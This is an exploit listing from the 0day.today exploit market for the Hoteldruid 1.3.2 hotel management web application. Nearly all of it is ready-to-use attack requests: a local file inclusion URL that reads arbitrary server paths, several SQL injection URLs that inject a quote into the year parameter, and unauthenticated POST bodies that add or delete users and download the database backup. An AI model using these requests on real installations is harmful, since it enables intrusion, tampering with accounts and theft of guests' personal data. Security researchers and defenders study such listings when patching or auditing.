[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hoteldruid 1.3.2 LFI/SQLi/Add and Remove Users/Backup Download

Author
n0tch
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20734
Category
web applications
Date add
06-05-2013
Platform
php
+[-- LFI --]+

Vuln Links: 
------------

http://localhost/hotel/mostra_sorgente.php?file_sorgente=/

+[-- SQli --]+

Vuln Links: 
-----------

http://localhost/hoteldruid/creaprezzi.php?anno=2012'
http://localhost/hotel/messaggi.php?id_sessione=&anno=2012'
http://localhost/hotel/visualizza_tabelle.php?id_sessione=&anno=2012'&tipo_tabella=prenotazioni&sel_tab_prenota=tutte


+[-- Add / Remove Users / DB Download --]+

Remove User:
------------

URL: http://localhost/hotel/gestione_utenti.php
POST-CONTENT: anno=2012&id_sessione=&cancella=SI&id_utente_canc=3&continua=SI


Add User:
---------

URL: http://localhost/hotel/gestione_utenti.php
POST-CONTENT: anno=2012&id_sessione=&nome=newuser&aggiungi_utente=Add


Download DB-Backup
------------------

URL: http://localhost/hotel/crea_backup.php
POST-CONTENT: anno=&id_sessione=&azione=SI&mostra_header=NO&salva_backup=View+the+file&compresso=SI

+[-- Shoutz --]+

- belegit.net/forum
- d4tabase.com

#  0day.today [2024-11-15]  #